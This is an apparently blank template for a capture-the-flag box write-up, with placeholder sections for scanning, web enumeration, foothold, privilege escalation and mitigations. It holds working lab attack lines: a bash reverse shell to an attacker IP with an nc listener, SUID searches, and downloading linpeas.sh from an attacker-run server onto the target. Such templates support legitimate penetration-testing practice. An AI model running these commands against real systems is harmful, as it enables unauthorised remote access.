Box Information
| Property | Value |
|---|---|
| Name | Test |
| OS | Linux |
| Difficulty | Medium |
| IP | 10.10.11.x |
Summary
Key Vulnerabilities:
- Vulnerability 1
- Vulnerability 2
- Vulnerability 3
Enumeration
Nmap Scan
Initial scan:
nmap -sC -sV -oA nmap/ 10.10.11.x
Results:
| Port | Service | TCP/UDP |
|---|---|---|
Key findings:
- Service 1: Description
- Service 2: Description
Web Enumeration
Directory brute-forcing:
gobuster dir -u http://10.10.11.x -w /usr/share/wordlists/dirb/common.txt
Discovered endpoints:
- /admin - Admin panel
- /api - REST API
- /uploads - File upload directory
Technology stack:
- Framework:
- Language:
- Database:
Port XXX Enumeration
Initial Foothold
Vulnerability Discovery
Vulnerability: [Vulnerability Name]
Testing the vulnerability:
# Commands used to test/verify the vulnerability
Proof of Concept:
# Exploit code or script
import requests
url = "http://10.10.11.x/vulnerable-endpoint"
payload = {}
response = requests.post(url, data=payload)
print(response.text)
Exploitation
Step 1: [Action taken]
# Commands
Step 2: [Next action]
# Commands
Getting a shell:
# Reverse shell command
bash -c 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'
Listener:
nc -lvnp 4444
User Flag
Stabilize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
Enumerate the system:
whoami
id
uname -a
pwd
ls -la
User flag location:
cat /home/user/user.txt
flag{user_flag_here}
Privilege Escalation
Enumeration as [username]
Check sudo privileges:
sudo -l
Check for SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Check for interesting files:
find / -name "*.conf" 2>/dev/null | grep -v "proc\|sys"
Running LinPEAS:
# On attacker machine
python3 -m http.server 8000
# On target
wget http://10.10.14.x:8000/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh
Lateral Movement (if applicable)
[!info] Moving to [next user]
Explanation of how to move laterally
Exploitation:
# Commands to switch users
Root Escalation
Vulnerability: [Escalation method]
[!warning] Exploitation Path
Detailed explanation of the privilege escalation vulnerability
Exploitation steps:
Step 1:
# Command
Step 2:
# Command
Step 3:
# Command
[!success] Root Access
Successfully escalated privileges to root
Root Flag
whoami
# root
cat /root/root.txt
flag{root_flag_here}
Post-Exploitation
Flags:
- User: flag{user_flag_here}
- Root: flag{root_flag_here}
Completion time: X hours
Lessons Learned
Vulnerabilities Identified
- [Vulnerability 1]
  - Impact: High/Medium/Low
  - Affected component:
  - Exploitation difficulty: Easy/Medium/Hard
- [Vulnerability 2]
  - Impact:
  - Affected component:
  - Exploitation difficulty:
Mitigation Recommendations
For [Vulnerability 1]:
- Recommendation 1
- Recommendation 2
- Recommendation 3
For [Vulnerability 2]:
- Recommendation 1
- Recommendation 2
Key Techniques Used
- Technique 1 with brief explanation
- Technique 2 with brief explanation
- Technique 3 with brief explanation
Things That Didn’t Work
[!failure] Dead Ends
- Rabbit hole 1: Why it didn’t work
- Rabbit hole 2: What I learned from it
Tools Used
| Tool | Purpose | Command/Usage |
|---|---|---|
| nmap | Port scanning | nmap -sC -sV target |
| gobuster | Directory enumeration | gobuster dir -u URL -w wordlist |
| burpsuite | Web traffic analysis | Interactive |
| linpeas | Linux enumeration | ./linpeas.sh |
| custom exploit | Specific vulnerability | python3 exploit.py |
References
- Vulnerability Name - CVE-XXXX-XXXXX
- GTFOBins - Tool
- HackTricks - Technique
- OWASP - Vulnerability Type
Timeline
graph LR
A[Nmap Scan] --> B[Web Enum]
B --> C[Vuln Discovery]
C --> D[Initial Shell]
D --> E[User Flag]
E --> F[PrivEsc Enum]
F --> G[Root Shell]
G --> H[Root Flag]
Pwned on: January 22, 2026
Difficulty Rating: ☭☭☭☭ (Personal rating)
Fun Factor: ☭☭☭☭☭☁ (How enjoyable was it?)